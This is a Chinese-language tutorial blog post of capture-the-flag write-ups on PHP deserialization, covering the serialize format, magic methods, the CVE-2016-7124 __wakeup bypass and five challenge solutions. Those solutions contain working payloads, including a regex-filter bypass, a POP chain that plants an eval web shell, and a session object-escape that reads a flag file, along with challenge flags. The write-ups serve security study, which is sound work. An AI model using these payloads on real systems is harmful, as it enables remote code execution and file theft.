PHP教程

周练3(php反序列化)

本文主要是介绍周练3(php反序列化),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

 

 

 

 

 

 

 

 

 

 

 

serialize()函数

$s = serialize($变量); //该函数将变量数据进行序列化转换为字符串

file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件

a - array         b - boolean

d - double         i - integer

o - common object     r - reference

s - string         C - custom object

O - class         N - null

R - pointer reference   U - unicode string

了解了缩写的类型字母,便可以得到PHP序列化格式

1

2

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}

对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

unserialize()函数

$s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容(之前序列化过的字符串)

$变量 = unserialize($s); //将该文本内容,反序列化到指定的变量中

魔术方法

1

2

3

4

5

6

7

8

9

10

11

12

13

14

__construct  当一个对象创建时被调用,

__destruct  当一个对象销毁时被调用,

__toString  当一个对象被当作一个字符串被调用。

__wakeup()  使用unserialize时触发

__sleep()  使用serialize时触发

__destruct()  对象被销毁时触发

__call()  在对象上下文中调用不可访问的方法时触发

__callStatic()  在静态上下文中调用不可访问的方法时触发

__get()  用于从不可访问的属性读取数据

__set()  用于将数据写入不可访问的属性

__isset()  在不可访问的属性上调用isset()或empty()触发

__unset()   在不可访问的属性上使用unset()时触发

__toString()  把类当作字符串使用时触发,返回值需要为字符串

__invoke()  当脚本尝试将对象调用为函数时触发本特性

只在 PHP 5.3.0 及以上版本有效。

 

 

 

 

 

 

 

wakeup()魔法函数绕过

 

1

2

PHP5<5.6.25

PHP7<7.0.10

 

PHP反序列化漏洞CVE-2016-7124

 

#a#重点:当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行

 

1.unserialize3

 

 

class xctf{                      //定义一个名为xctf的类
public $flag = '111';            //定义一个公有的类属性$flag,值为111
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
}
?code=

the answer is : cyberpeace{24a1e95dab10ea486aed8d9ffccbcbd1}

2.Web_php_unserialize

 

highlight_file() 函数对文件进行语法高亮显示。

语法

highlight_file(filename,return)
参数描述
filename 必需。要进行高亮处理的 PHP 文件的路径。
return 可选。如果设置 true,则本函数返回高亮处理的代码。
<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; (赋值)
    }

    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }

    function __wakeup() { //需绕过
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php(提示)
            $this->file = 'index.php'; 
          } 
    } 

}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); //base64解码
    if (preg_match('/[oc]:\d+:/i', $var)) { //黑名单'o:c',可以用'o:+c'替代
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

“O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}”

 

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

 

3.[极客大挑战 2019]PHP

 

 
<?php
    include 'class.php';
    $select = $_GET['select'];//传入参数
    $res=unserialize(@$select);
    ?>
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';        //初始化
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;      //赋值
    }
    function __wakeup(){
        $this->username = 'guest';       //需绕过
    }
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
                  die();          //password=100
        }
        if ($this->username === 'admin') {  //username='admin'
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();     
        }
    }
}
?>

 

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

 

flag{d2e7fc8f-788c-45b9-a16b-a84c7a09ee20}

4. web/fxlh1/

<?php
class crow
{
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke()
    {
        $this->v1->world();      //3. 引发_call函数
    }
}
class fin
{
    public $f1;
    public function __destruct()
    {
        echo $this->f1 . '114514';   //6. 调用_tostring()函数
    }
    public function run()
    {
        ($this->f1)();          
    }
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();  //2. 调用get_flag()函数
    }
}
class what
{
    public $a;
    public function __toString()
    {
        $this->a->run();        //5. 调用run()函数
        return 'hello';
    }
}
class mix
{
    public $m1;
    public function run()
    {
        ($this->m1)();          //4. 引发_invoke函数
    }
    public function get_flag()
    {
        eval('#'.$this->m1);      //1.目标
    }
}
highlight_file(__FILE__);
if (isset($_POST['pop'])) {
    unserialize($_POST['pop']);
}
<?php
class crow
{
    public $v1;
    public $v2;

    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

class fin
{
    public $f1;

    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

}

$f = new mix("?><?=eval(\$_POST[1]);");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?>
//cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

5.[安洵杯 2019]easy_serialize_php 1

考点

  • PHP中反序列化的对象逃逸a:2:{s:7:"flagphp";
  • s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
  • s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
    • a:2:{s:7:" ";s:48: ";s:1:"a";
    • s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";
    • s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
 <?php
$function = @$_GET['f'];
//构造过滤函数
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
if($_SESSION){
    unset($_SESSION);
}
//初赋值
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);                            //可以实现变量覆盖
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');      //img赋值
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!(发现d0g3_f1ag.php)
}else if($function == 'show_image'){                   //确定function的值
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));    //目标
} 

_SESSION[function]=show_image&_SESSION[1]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

a:3:{s:8:"function";s:10:"show_image"

;i:1;s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";

s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}

a:3:{s:8:"function";s:22:"show_image";i:1;s:60:"";

s:3:"qwe";s:2:"qw";

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

";s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}


这篇关于周练3(php反序列化)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!